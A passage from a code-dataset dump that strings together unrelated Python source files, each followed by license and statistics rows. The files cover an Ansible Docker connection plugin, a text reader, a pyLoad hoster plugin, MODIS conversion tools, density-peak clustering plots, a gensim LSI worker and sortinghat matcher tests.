local_cmd = '%s exec "%s" %s' % (self.docker_cmd, self.host, cmd)
vvv("EXEC %s" % (local_cmd), host=self.host)
p = subprocess.Popen(local_cmd,
shell=isinstance(local_cmd, basestring),
cwd=self.runner.basedir,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
return (p.returncode, '', stdout, stderr)
# Docker doesn't have native support for copying files into running
# containers, so we use docker exec to implement this
def put_file(self, in_path, out_path):
""" Transfer a file from local to container """
args = [self.docker_cmd, "exec", "-i", self.host, "bash", "-c",
"cat > %s" % format(out_path)]
vvv("PUT %s TO %s" % (in_path, out_path), host=self.host)
if not os.path.exists(in_path):
raise errors.AnsibleFileNotFound(
"file or module does not exist: %s" % in_path)
p = subprocess.Popen(args, stdin=open(in_path),
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p.communicate()
# HACK: Due to a race condition, this sometimes returns before
# the file has been written to disk, so we sleep for one second
time.sleep(1)
def fetch_file(self, in_path, out_path):
""" Fetch a file from container to local. """
# out_path is the final file path, but docker takes a directory, not a
# file path
out_dir = os.path.dirname(out_path)
args = [self.docker_cmd, "cp", "%s:%s" % (self.host, in_path), out_dir]
vvv("FETCH %s TO %s" % (in_path, out_path), host=self.host)
p = subprocess.Popen(args, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
p.communicate()
# Rename if needed
actual_out_path = os.path.join(out_dir, os.path.basename(in_path))
if actual_out_path != out_path:
os.rename(actual_out_path, out_path)
def close(self):
""" Terminate the connection. Nothing to do for Docker"""
pass
|
gpl-3.0
| 7,907,822,090,526,358,000
| 37.642857
| 79
| 0.567468
| false
| 4.098485
| false
| false
| false
|
JeroenBosmans/nabu
|
nabu/processing/text_reader.py
|
1
|
3606
|
'''@file textreader.py
contains the Textreader class'''
import os
import numpy as np
class TextReader(object):
'''reads text from disk'''
def __init__(self, textfile, max_length, coder, base_pos=0,
end_pos=None):
'''TextReader constructor
Args:
textfile: the path to the file containing the text
max_length: the maximal length of a line
coder: a TargetCoder object
            base_pos: the base position where to start reading in the file
end_pos: optional maximal position in the file'''
self.max_length = max_length
self.coder = coder
#initialise the position to the beginning of the file
self.base_pos = base_pos
self.pos = base_pos
self.end_pos = end_pos or os.path.getsize(textfile)
if base_pos >= self.end_pos:
raise Exception('base position should come before end position')
        #store the text file path
self.textfile = textfile
def get_utt(self):
        '''read the next line from the text file
        Returns:
- the line identifier
- the read line as a [length x 1] numpy array
- whether or not the read utterance is the last one
'''
#read a line
line_id, line, looped = self.read_line()
#encode the line
encoded = self.coder.encode(line)[:, np.newaxis]
return line_id, encoded, looped
def read_line(self):
        '''read the next line from the text file
        Returns:
- the line identifier
- the read line as a string
- whether or not the read utterance is the last one
'''
        #create the utterance id
line_id = 'line%d' % self.pos
#read a line in the scp file
with open(self.textfile) as fid:
fid.seek(self.pos)
line = fid.readline().strip()
self.pos = fid.tell()
#if end of file is reached loop around
if self.pos >= self.end_pos:
looped = True
self.pos = self.base_pos
else:
looped = False
return line_id, line, looped
def split(self, numlines):
'''split of a part of the textreader
Args:
            numlines: number of lines that should be in the new textreader
Returns:
a Textreader object that contains the required number of lines
'''
#read the requested number of lines
self.pos = self.base_pos
for _ in range(numlines):
_, _, looped = self.get_utt()
if looped:
                raise Exception('number of requested lines exceeds the content')
#create a new textreader with the appropriate boundaries
        textreader = TextReader(self.textfile, self.max_length, self.coder,
                                self.base_pos, self.pos)
#update the base position
self.base_pos = self.pos
return textreader
def as_dict(self):
'''return the reader as a dictionary'''
#save the position
pos = self.pos
#start at the beginning
self.pos = self.base_pos
asdict = dict()
looped = False
while not looped:
line_id, line, looped = self.read_line()
asdict[line_id] = line
#set the position back to the original
        self.pos = pos
        return asdict
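# Illustrative sketch (not part of the original module): iterate once over a
# text file. `coder` must be a TargetCoder instance; the path is hypothetical.
#   reader = TextReader('/data/train/text', max_length=100, coder=coder)
#   looped = False
#   while not looped:
#       line_id, encoded, looped = reader.get_utt()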
|
mit
| -8,119,472,119,550,117,000
| 27.619048
| 79
| 0.567388
| false
| 4.222482
| false
| false
| false
|
zenieldanaku/pygpj
|
main.py
|
1
|
1847
|
import func.core.config as c
import func.core.intro as intro
from func.core.lang import t
from func.core.viz import subselector
from func.core.prsnj import Pj
from func.core.export import imprimir_clases
import os
def cargar_archivo(prompt, carpeta):
from func.data.setup import data as s
ars, nom = [], []
for ar in os.listdir(carpeta):
if os.path.isfile(carpeta+'/'+ar):
personaje = c.abrir_json(carpeta+'/'+ar)
nom.append(personaje['nombre']+' ('+imprimir_clases(personaje['cla'],s.CLASES)+')')
ars.append(ar)
sel = subselector(prompt,nom,True)
data = c.abrir_json(carpeta+'/'+ars[sel])
return data
def menu ():
while True:
opciones = [t('Crear un nuevo personaje'),
t('Avanzar un personaje existente'),
t('Editar preferencias'),
t('Salir'),
'\n'+t('Ver licencia')]
intro.imprimir_titulo()
intro.introduccion()
print(t('Elije una opción'))
op = subselector(t('Opción'),opciones)
        if op == 0: # Create a new character
import func.core.chargen
Pj.nuevo_pj()
func.core.chargen.go()
        elif op == 1: # Advance an existing character
import func.core.chargen
Pj.cargar_pj(cargar_archivo('Personaje','Guardar'))
func.core.chargen.go()
        elif op == 2: # preferences
c.preferencias(c.abrir_json('config.json'))
elif op == 3: # exit
break
elif op == 4:
intro.licencia('LICENSE.txt')
input(t('\n[Presione Enter para continuar]\n'))
if __name__ == '__main__':
os.system(['clear','cls'][os.name == 'nt'])
menu()
|
mit
| -6,750,891,117,660,819,000
| 32.166667
| 95
| 0.532249
| false
| 3.300537
| false
| false
| false
|
fzimmermann89/pyload
|
module/plugins/hoster/LoadTo.py
|
1
|
2129
|
# -*- coding: utf-8 -*-
#
# Test links:
# http://www.load.to/JWydcofUY6/random.bin
# http://www.load.to/oeSmrfkXE/random100.bin
import re
from module.plugins.captcha.SolveMedia import SolveMedia
from module.plugins.internal.SimpleHoster import SimpleHoster, create_getInfo
class LoadTo(SimpleHoster):
__name__ = "LoadTo"
__type__ = "hoster"
__version__ = "0.26"
__status__ = "testing"
__pattern__ = r'http://(?:www\.)?load\.to/\w+'
__config__ = [("activated" , "bool", "Activated" , True),
("use_premium", "bool", "Use premium account if available", True)]
__description__ = """Load.to hoster plugin"""
__license__ = "GPLv3"
__authors__ = [("halfman", "Pulpan3@gmail.com"),
("stickell", "l.stickell@yahoo.it")]
NAME_PATTERN = r'<h1>(?P<N>.+?)</h1>'
SIZE_PATTERN = r'Size: (?P<S>[\d.,]+) (?P<U>[\w^_]+)'
OFFLINE_PATTERN = r'>Can\'t find file'
LINK_FREE_PATTERN = r'<form method="post" action="(.+?)"'
WAIT_PATTERN = r'type="submit" value="Download \((\d+)\)"'
URL_REPLACEMENTS = [(r'(\w)$', r'\1/')]
def setup(self):
self.multiDL = True
self.chunk_limit = 1
def handle_free(self, pyfile):
#: Search for Download URL
m = re.search(self.LINK_FREE_PATTERN, self.html)
if m is None:
self.error(_("LINK_FREE_PATTERN not found"))
self.link = m.group(1)
#: Set Timer - may be obsolete
m = re.search(self.WAIT_PATTERN, self.html)
if m is not None:
self.wait(m.group(1))
#: Load.to is using solvemedia captchas since ~july 2014:
solvemedia = SolveMedia(self)
captcha_key = solvemedia.detect_key()
if captcha_key:
response, challenge = solvemedia.challenge(captcha_key)
self.download(self.link,
post={'adcopy_challenge': challenge,
'adcopy_response' : response,
'returnUrl' : pyfile.url})
getInfo = create_getInfo(LoadTo)
|
gpl-3.0
| 2,512,844,144,708,544,500
| 29.855072
| 85
| 0.542508
| false
| 3.379365
| false
| false
| false
|
SUNET/eduid-webapp
|
src/eduid_webapp/idp/tou_action.py
|
1
|
2992
|
#
# Copyright (c) 2015 NORDUnet A/S
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or
# without modification, are permitted provided that the following
# conditions are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# 3. Neither the name of the NORDUnet nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
__author__ = 'eperez'
from typing import Optional
from eduid_common.session.logindata import SSOLoginData
from eduid_userdb.actions import Action
from eduid_userdb.idp import IdPUser
from eduid_webapp.idp.app import current_idp_app as current_app
def add_actions(user: IdPUser, ticket: SSOLoginData) -> Optional[Action]:
"""
Add an action requiring the user to accept a new version of the Terms of Use,
in case the IdP configuration points to a version the user hasn't accepted.
This function is called by the IdP when it iterates over all the registered
    action plugin entry points.
:param user: the authenticating user
:param ticket: the SSO login data
"""
version = current_app.conf.tou_version
interval = current_app.conf.tou_reaccept_interval
if user.tou.has_accepted(version, interval):
current_app.logger.debug(f'User has already accepted ToU version {version!r}')
return None
if not current_app.actions_db:
current_app.logger.warning('No actions_db - aborting ToU action')
return None
if current_app.actions_db.has_actions(user.eppn, action_type='tou', params={'version': version}):
return None
current_app.logger.debug(f'User must accept ToU version {version!r}')
return current_app.actions_db.add_action(user.eppn, action_type='tou', preference=100, params={'version': version})
|
bsd-3-clause
| 7,871,357,113,988,800,000
| 41.742857
| 119
| 0.739973
| false
| 4.087432
| false
| false
| false
|
robin-lai/DensityPeakCluster
|
plot.py
|
1
|
1965
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import logging
import numpy as np
from cluster import *
from sklearn import manifold
from plot_utils import *
def plot_rho_delta(rho, delta):
'''
Plot scatter diagram for rho-delta points
Args:
rho : rho list
delta : delta list
'''
logger.info("PLOT: rho-delta plot")
plot_scatter_diagram(0, rho[1:], delta[1:], x_label='rho', y_label='delta', title='rho-delta')
def plot_cluster(cluster):
'''
Plot scatter diagram for final points that using multi-dimensional scaling for data
Args:
cluster : DensityPeakCluster object
'''
logger.info("PLOT: cluster result, start multi-dimensional scaling")
dp = np.zeros((cluster.max_id, cluster.max_id), dtype = np.float32)
cls = []
for i in xrange(1, cluster.max_id):
for j in xrange(i + 1, cluster.max_id + 1):
dp[i - 1, j - 1] = cluster.distances[(i, j)]
dp[j - 1, i - 1] = cluster.distances[(i, j)]
cls.append(cluster.cluster[i])
cls.append(cluster.cluster[cluster.max_id])
cls = np.array(cls, dtype = np.float32)
fo = open(r'./tmp.txt', 'w')
fo.write('\n'.join(map(str, cls)))
fo.close()
seed = np.random.RandomState(seed=3)
mds = manifold.MDS(max_iter=200, eps=1e-4, n_init=1)
dp_mds = mds.fit_transform(dp)
logger.info("PLOT: end mds, start plot")
plot_scatter_diagram(1, dp_mds[:, 0], dp_mds[:, 1], title='cluster', style_list = cls)
if __name__ == '__main__':
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
dpcluster = DensityPeakCluster()
# dpcluster.local_density(load_paperdata, './example_distances.dat')
# plot_rho_delta(rho, delta) #plot to choose the threthold
rho, delta, nneigh = dpcluster.cluster(load_paperdata, './data/data_in_paper/example_distances.dat', 20, 0.1)
logger.info(str(len(dpcluster.ccenter)) + ' center as below')
for idx, center in dpcluster.ccenter.items():
logger.info('%d %f %f' %(idx, rho[center], delta[center]))
plot_cluster(dpcluster)
|
mit
| -2,970,879,158,770,166,000
| 34.107143
| 110
| 0.679389
| false
| 2.779349
| false
| false
| false
|
samantp/gensimPy3
|
gensim/models/lsi_worker.py
|
1
|
3221
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2010 Radim Rehurek <radimrehurek@seznam.cz>
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
USAGE: %(program)s
Worker ("slave") process used in computing distributed LSI. Run this script \
on every node in your cluster. If you wish, you may even run it multiple times \
on a single machine, to make better use of multiple cores (just beware that \
memory footprint increases accordingly).
Example: python -m gensim.models.lsi_worker
"""
import os, sys, logging
import threading
import tempfile
from gensim.models import lsimodel
from gensim import utils
logger = logging.getLogger('gensim.models.lsi_worker')
SAVE_DEBUG = 0 # save intermediate models after every SAVE_DEBUG updates (0 for never)
class Worker(object):
def __init__(self):
self.model = None
def initialize(self, myid, dispatcher, **model_params):
self.lock_update = threading.Lock()
self.jobsdone = 0 # how many jobs has this worker completed?
self.myid = myid # id of this worker in the dispatcher; just a convenience var for easy access/logging TODO remove?
self.dispatcher = dispatcher
logger.info("initializing worker #%s" % myid)
self.model = lsimodel.LsiModel(**model_params)
def requestjob(self):
"""
Request jobs from the dispatcher in an infinite loop. The requests are
blocking, so if there are no jobs available, the thread will wait.
"""
if self.model is None:
raise RuntimeError("worker must be initialized before receiving jobs")
job = self.dispatcher.getjob(self.myid) # blocks until a new job is available from the dispatcher
logger.info("worker #%s received job #%i" % (self.myid, self.jobsdone))
self.processjob(job)
self.dispatcher.jobdone(self.myid)
@utils.synchronous('lock_update')
def processjob(self, job):
self.model.add_documents(job)
self.jobsdone += 1
if SAVE_DEBUG and self.jobsdone % SAVE_DEBUG == 0:
fname = os.path.join(tempfile.gettempdir(), 'lsi_worker.pkl')
self.model.save(fname)
@utils.synchronous('lock_update')
def getstate(self):
logger.info("worker #%i returning its state after %s jobs" %
(self.myid, self.jobsdone))
assert isinstance(self.model.projection, lsimodel.Projection)
result = self.model.projection
self.model.projection = self.model.projection.empty_like()
return result
def exit(self):
logger.info("terminating worker #%i" % self.myid)
os._exit(0)
#endclass Worker
def main():
logging.basicConfig(format = '%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
logger.info("running %s" % " ".join(sys.argv))
program = os.path.basename(sys.argv[0])
# make sure we have enough cmd line parameters
if len(sys.argv) < 1:
print(globals()["__doc__"] % locals())
sys.exit(1)
utils.pyro_daemon('gensim.lsi_worker', Worker(), random_suffix=True)
logger.info("finished running %s" % program)
if __name__ == '__main__':
main()
|
gpl-3.0
| -6,709,509,564,474,837,000
| 29.971154
| 123
| 0.656007
| false
| 3.710829
| false
| false
| false
|
gilliM/MFQ
|
ModisFromQgis/mypymodis/convertmodis.py
|
1
|
9852
|
#!/usr/bin/env python
# class to convert/process modis data
#
# (c) Copyright Luca Delucchi 2010
# Authors: Luca Delucchi
# Email: luca dot delucchi at iasma dot it
#
##################################################################
#
# This MODIS Python class is licensed under the terms of GNU GPL 2.
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of
# the License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
##################################################################
"""Convert MODIS HDF file to GeoTiff file or create a HDF mosaic file for
several tiles using Modis Reprojection Tools.
Classes:
* :class:`convertModis`
* :class:`createMosaic`
* :class:`processModis`
Functions:
* :func:`checkMRTpath`
"""
# to be compliant with python 3
from __future__ import print_function
import os
import sys
def checkMRTpath(mrtpath):
"""Function to check if MRT path it correct
:param str mrtpath: the path to MRT directory
:return: The path to 'bin' and 'data' directory inside MRT path
"""
if os.path.exists(mrtpath):
if os.path.exists(os.path.join(mrtpath, 'bin')):
mrtpathbin = os.path.join(mrtpath, 'bin')
os.environ['PATH'] = "{path}:{data}".format(path=os.environ['PATH'],
data=os.path.join(mrtpath, 'data'))
else:
raise IOError('The path {path} does not exist'.format(path=os.path.join(mrtpath, 'bin')))
if os.path.exists(os.path.join(mrtpath, 'data')):
mrtpathdata = os.path.join(mrtpath, 'data')
os.environ['MRTDATADIR'] = os.path.join(mrtpath, 'data')
else:
raise IOError('The path {path} does not exist'.format(path=os.path.join(mrtpath, 'data')))
else:
raise IOError('The path {name} does not exist'.format(name=mrtpath))
return mrtpathbin, mrtpathdata
class convertModis:
"""A class to convert modis data from hdf to tif using resample
(from MRT tools)
:param str hdfname: the full path to the hdf file
    :param str confile: the full path to the parameter file
:param str mrtpath: the full path to mrt directory which contains
the bin and data directories
"""
def __init__(self, hdfname, confile, mrtpath):
"""Initialization function"""
# check if the hdf file exists
if os.path.exists(hdfname):
self.name = hdfname
else:
raise IOError('{name} does not exist'.format(name=hdfname))
# check if confile exists
if os.path.exists(confile):
self.conf = confile
else:
raise IOError('{name} does not exist'.format(name=confile))
# check if mrtpath and subdirectories exists and set environment
# variables
self.mrtpathbin, self.mrtpathdata = checkMRTpath(mrtpath)
def executable(self):
"""Return the executable of resample MRT software"""
if sys.platform.count('linux') != -1:
if os.path.exists(os.path.join(self.mrtpathbin, 'resample')):
return os.path.join(self.mrtpathbin, 'resample')
elif sys.platform.count('win32') != -1:
if os.path.exists(os.path.join(self.mrtpathbin, 'resample.exe')):
return os.path.join(self.mrtpathbin, 'resample.exe')
def run(self):
"""Exec the convertion process"""
import subprocess
execut = self.executable()
if not os.path.exists(execut):
raise IOError('The path {name} does not exist: it could be an '
'erroneus path or software'.format(name=execut))
else:
subprocess.call([execut, '-p', self.conf])
return "The hdf file {name} was converted successfully".format(name=self.name)
class createMosaic:
"""A class to convert several MODIS tiles into a mosaic
:param str listfile: the path to file with the list of HDF MODIS
file
:param str outprefix: the prefix for output files
:param str mrtpath: the full path to mrt directory which contains
the bin and data directories
:param str subset: a string composed by 1 and 0 according with the
layer to mosaic. The string should something like
'1 0 1 0 0 0 0'
"""
def __init__(self, listfile, outprefix, mrtpath, subset=False):
"""Function to initialize the object"""
import tempfile
# check if the hdf file exists
if os.path.exists(listfile):
self.basepath = os.path.split(listfile)[0]
self.fullpath = os.path.realpath(self.basepath)
self.listfiles = listfile
self.tmplistfiles = open(os.path.join(tempfile.gettempdir(),
'{name}.prm'.format(name=str(os.getpid()))), 'w')
self.HDFfiles = open(listfile).readlines()
else:
            raise IOError('{name} does not exist'.format(name=listfile))
# check if mrtpath and subdirectories exists and set environment
# variables
self.mrtpathbin, self.mrtpathdata = checkMRTpath(mrtpath)
self.out = os.path.join(self.basepath, outprefix + '.hdf')
self.outxml = self.out + '.xml'
self.subset = subset
def write_mosaic_xml(self):
"""Write the XML metadata file for MODIS mosaic"""
from parsemodis import parseModisMulti
listHDF = []
for i in self.HDFfiles:
if i.find(self.basepath) == -1 and i.find('.hdf.xml') == -1:
print("Attention: maybe you do not have the full path in the"
" HDF file list")
listHDF.append(os.path.join(self.basepath, i.strip()))
self.tmplistfiles.write("{name}\n".format(name=os.path.join(self.basepath, i.strip())))
elif i.find('.hdf.xml') == -1:
listHDF.append(i.strip())
self.tmplistfiles.write("{name}\n".format(name=os.path.join(self.fullpath, i.strip())))
pmm = parseModisMulti(listHDF)
pmm.writexml(self.outxml)
self.tmplistfiles.close()
def executable(self):
"""Return the executable of mrtmosaic MRT software"""
if sys.platform.count('linux'):
if os.path.exists(os.path.join(self.mrtpathbin, 'mrtmosaic')):
return os.path.join(self.mrtpathbin, 'mrtmosaic')
elif sys.platform.count('win32'):
if os.path.exists(os.path.join(self.mrtpathbin, 'mrtmosaic.exe')):
return os.path.join(self.mrtpathbin, 'mrtmosaic.exe')
def run(self):
"""Exect the mosaic process"""
import subprocess
execut = self.executable()
if not os.path.exists(execut):
raise IOError('The path {name} does not exist, it could be an '
'erroneus path or software'.format(name=execut))
else:
self.write_mosaic_xml()
if self.subset:
subprocess.call([execut, '-i', self.tmplistfiles.name, '-o',
self.out, '-s', self.subset],
stderr=subprocess.STDOUT)
else:
subprocess.call([execut, '-i', self.tmplistfiles.name, '-o',
self.out], stderr=subprocess.STDOUT)
return "The mosaic file {name} has been created".format(name=self.out)
class processModis:
"""A class to process raw modis data from hdf to tif using swath2grid
(from MRT Swath tools)
:param str hdfname: the full path to the hdf file
    :param str confile: the full path to the parameter file
:param str mrtpath: the full path to mrt directory which contains
the bin and data directories
"""
def __init__(self, hdfname, confile, mrtpath):
"""Function to initialize the object"""
# check if the hdf file exists
if os.path.exists(hdfname):
self.name = hdfname
else:
raise IOError('%s does not exist' % hdfname)
# check if confile exists
if os.path.exists(confile):
self.conf = confile
else:
raise IOError('%s does not exist' % confile)
# check if mrtpath and subdirectories exists and set environment
# variables
self.mrtpathbin, self.mrtpathdata = checkMRTpath(mrtpath)
def executable(self):
"""Return the executable of resample MRT software"""
if sys.platform.count('linux') != -1:
if os.path.exists(os.path.join(self.mrtpathbin, 'swath2grid')):
return os.path.join(self.mrtpathbin, 'swath2grid')
elif sys.platform.count('win32') != -1:
if os.path.exists(os.path.join(self.mrtpathbin, 'swath2grid.exe')):
return os.path.join(self.mrtpathbin, 'swath2grid.exe')
def run(self):
"""Exec the convertion process"""
import subprocess
execut = self.executable()
if not os.path.exists(execut):
raise IOError('The path {name} does not exist, it could be an '
'erroneus path or software'.format(name=execut))
else:
subprocess.call([execut, '-pf={name}'.format(name=self.conf)])
return "The hdf file {name} has been converted".format(name=self.name)
|
gpl-2.0
| 3,430,796,322,326,660,000
| 41.649351
| 103
| 0.593991
| false
| 3.830482
| false
| false
| false
|
MetricsGrimoire/sortinghat
|
tests/test_matcher.py
|
1
|
11000
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2014-2017 Bitergia
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Authors:
# Santiago Dueñas <sduenas@bitergia.com>
#
import sys
import unittest
if '..' not in sys.path:
sys.path.insert(0, '..')
from sortinghat.db.model import UniqueIdentity, Identity, MatchingBlacklist
from sortinghat.exceptions import MatcherNotSupportedError
from sortinghat.matcher import IdentityMatcher, create_identity_matcher, match
from sortinghat.matching import EmailMatcher, EmailNameMatcher
class TestCreateIdentityMatcher(unittest.TestCase):
def test_identity_matcher_instance(self):
"""Test if the factory function returns an identity matcher instance"""
matcher = create_identity_matcher('default')
self.assertIsInstance(matcher, IdentityMatcher)
matcher = create_identity_matcher('email')
self.assertIsInstance(matcher, EmailMatcher)
matcher = create_identity_matcher('email-name')
self.assertIsInstance(matcher, EmailNameMatcher)
def test_identity_matcher_instance_with_blacklist(self):
"""Test if the factory function adds a blacklist to the matcher instance"""
# The blacklist is empty
matcher = create_identity_matcher('default')
self.assertIsInstance(matcher, IdentityMatcher)
self.assertEqual(len(matcher.blacklist), 0)
# Create a matcher with a blacklist
blacklist = [MatchingBlacklist(excluded='JSMITH@example.com'),
MatchingBlacklist(excluded='jrae@example.com'),
MatchingBlacklist(excluded='jrae@example.net'),
MatchingBlacklist(excluded='John Smith'),
MatchingBlacklist(excluded='root')]
matcher = create_identity_matcher('default', blacklist=blacklist)
self.assertIsInstance(matcher, IdentityMatcher)
self.assertEqual(len(matcher.blacklist), 5)
def test_identity_matcher_instance_with_sources_list(self):
"""Test if the factory function adds a sources list to the matcher instance"""
# The sources list is None
matcher = create_identity_matcher('default')
self.assertIsInstance(matcher, IdentityMatcher)
self.assertEqual(matcher.sources, None)
# Create a matcher with a sources list
sources = ['git', 'jira', 'github']
matcher = create_identity_matcher('default', sources=sources)
self.assertIsInstance(matcher, IdentityMatcher)
self.assertEqual(len(matcher.sources), 3)
def test_identity_matcher_instance_with_strict(self):
"""Test if the factory function adds the strict mode to the matcher instance"""
matcher = create_identity_matcher('default')
self.assertIsInstance(matcher, IdentityMatcher)
self.assertEqual(matcher.strict, True)
matcher = create_identity_matcher('default', strict=False)
self.assertIsInstance(matcher, IdentityMatcher)
self.assertEqual(matcher.strict, False)
def test_not_supported_matcher(self):
"""Check if an exception is raised when the given matcher type is not supported"""
self.assertRaises(MatcherNotSupportedError,
create_identity_matcher, 'custom')
class TestIdentityMatcher(unittest.TestCase):
"""Test IdentityMatcher class"""
def test_blacklist(self):
"""Test blacklist contents"""
m = IdentityMatcher()
self.assertListEqual(m.blacklist, [])
m = IdentityMatcher(blacklist=[])
self.assertListEqual(m.blacklist, [])
blacklist = [MatchingBlacklist(excluded='JSMITH@example.com'),
MatchingBlacklist(excluded='jrae@example.com'),
MatchingBlacklist(excluded='jrae@example.net'),
MatchingBlacklist(excluded='John Smith'),
MatchingBlacklist(excluded='root')]
m = IdentityMatcher(blacklist=blacklist)
self.assertListEqual(m.blacklist, ['john smith', 'jrae@example.com',
'jrae@example.net', 'jsmith@example.com',
'root'])
def test_sources_list(self):
"""Test sources list contents"""
m = IdentityMatcher()
self.assertEqual(m.sources, None)
        m = IdentityMatcher(sources=[])
self.assertEqual(m.sources, None)
sources = ['git', 'Jira', 'GitHub']
m = IdentityMatcher(sources=sources)
self.assertListEqual(m.sources, ['git', 'github', 'jira'])
def test_strict_mode(self):
"""Test strict mode value"""
m = IdentityMatcher()
self.assertEqual(m.strict, True)
m = IdentityMatcher(strict=False)
self.assertEqual(m.strict, False)
class TestMatch(unittest.TestCase):
"""Test match function"""
def setUp(self):
# Add some unique identities
self.john_smith = UniqueIdentity('John Smith')
self.john_smith.identities = [Identity(email='jsmith@example.com', name='John Smith',
source='scm', uuid='John Smith'),
Identity(name='John Smith',
source='scm', uuid='John Smith'),
Identity(username='jsmith',
source='scm', uuid='John Smith')]
self.jsmith = UniqueIdentity('J. Smith')
self.jsmith.identities = [Identity(name='J. Smith', username='john_smith',
source='alt', uuid='J. Smith'),
Identity(name='John Smith', username='jsmith',
source='alt', uuid='J. Smith'),
Identity(email='jsmith',
source='alt', uuid='J. Smith')]
self.jane_rae = UniqueIdentity('Jane Rae')
self.jane_rae.identities = [Identity(name='Janer Rae',
source='mls', uuid='Jane Rae'),
Identity(email='jane.rae@example.net', name='Jane Rae Doe',
source='mls', uuid='Jane Rae')]
self.js_alt = UniqueIdentity('john_smith')
self.js_alt.identities = [Identity(name='J. Smith', username='john_smith',
source='scm', uuid='john_smith'),
Identity(username='john_smith',
source='mls', uuid='john_smith'),
Identity(username='Smith. J',
source='mls', uuid='john_smith'),
Identity(email='JSmith@example.com', name='Smith. J',
source='mls', uuid='john_smith')]
self.jrae = UniqueIdentity('jrae')
self.jrae.identities = [Identity(email='jrae@example.net', name='Jane Rae Doe',
source='mls', uuid='jrae'),
Identity(name='jrae', source='mls', uuid='jrae'),
Identity(name='jrae', source='scm', uuid='jrae')]
def test_match_email(self):
"""Test whether the function finds every possible matching using email matcher"""
uidentities = [self.jsmith, self.jrae, self.js_alt,
self.john_smith, self.jane_rae]
matcher = EmailMatcher()
result = match([], matcher)
self.assertEqual(len(result), 0)
result = match(uidentities, matcher)
self.assertEqual(len(result), 4)
self.assertListEqual(result,
[[self.john_smith, self.js_alt],
[self.jane_rae], [self.jrae], [self.jsmith]])
def test_match_email_name(self):
"""Test whether the function finds every possible matching using email-name matcher"""
uidentities = [self.jsmith, self.jrae, self.js_alt,
self.john_smith, self.jane_rae]
matcher = EmailNameMatcher()
result = match([], matcher)
self.assertEqual(len(result), 0)
result = match(uidentities, matcher)
self.assertEqual(len(result), 2)
self.assertListEqual(result,
[[self.jsmith, self.john_smith, self.js_alt],
[self.jane_rae, self.jrae]])
def test_match_email_fast_mode(self):
"""Test matching in fast mode using email matcher"""
uidentities = [self.jsmith, self.jrae, self.js_alt,
self.john_smith, self.jane_rae]
matcher = EmailMatcher()
result = match([], matcher, fastmode=True)
self.assertEqual(len(result), 0)
result = match(uidentities, matcher, fastmode=True)
self.assertEqual(len(result), 4)
self.assertListEqual(result,
[[self.john_smith, self.js_alt],
[self.jane_rae], [self.jrae], [self.jsmith]])
def test_match_email_name_fast_mode(self):
"""Test matching in fast mode using email-name matcher"""
uidentities = [self.jsmith, self.jrae, self.js_alt,
self.john_smith, self.jane_rae]
matcher = EmailNameMatcher()
result = match([], matcher, fastmode=True)
self.assertEqual(len(result), 0)
result = match(uidentities, matcher, fastmode=True)
self.assertEqual(len(result), 2)
self.assertListEqual(result,
[[self.jsmith, self.john_smith, self.js_alt],
[self.jane_rae, self.jrae]])
def test_matcher_error(self):
"""Test if it raises an error when the matcher is not valid"""
self.assertRaises(TypeError, match, [], None)
self.assertRaises(TypeError, match, [], "")
def test_matcher_not_supported_fast_mode(self):
"""Test if it raises and error when a matcher does not supports the fast mode"""
matcher = IdentityMatcher()
self.assertRaises(MatcherNotSupportedError,
match, [], matcher, True)
if __name__ == "__main__":
unittest.main()
|
gpl-3.0
| 5,165,033,627,049,388,000
| 38.282143
| 95
| 0.582508
| false
| 4.366415
| true
| false
| false
|
lexman/tuttle
|
tuttle/process.py
|
1
|
4297
|
# -*- coding: utf8 -*-
from time import time
class Process:
""" Class wrapping a process. A process has some input resources, some output resources,
some code that produces outputs from inputs, a processor that handle the language specificities
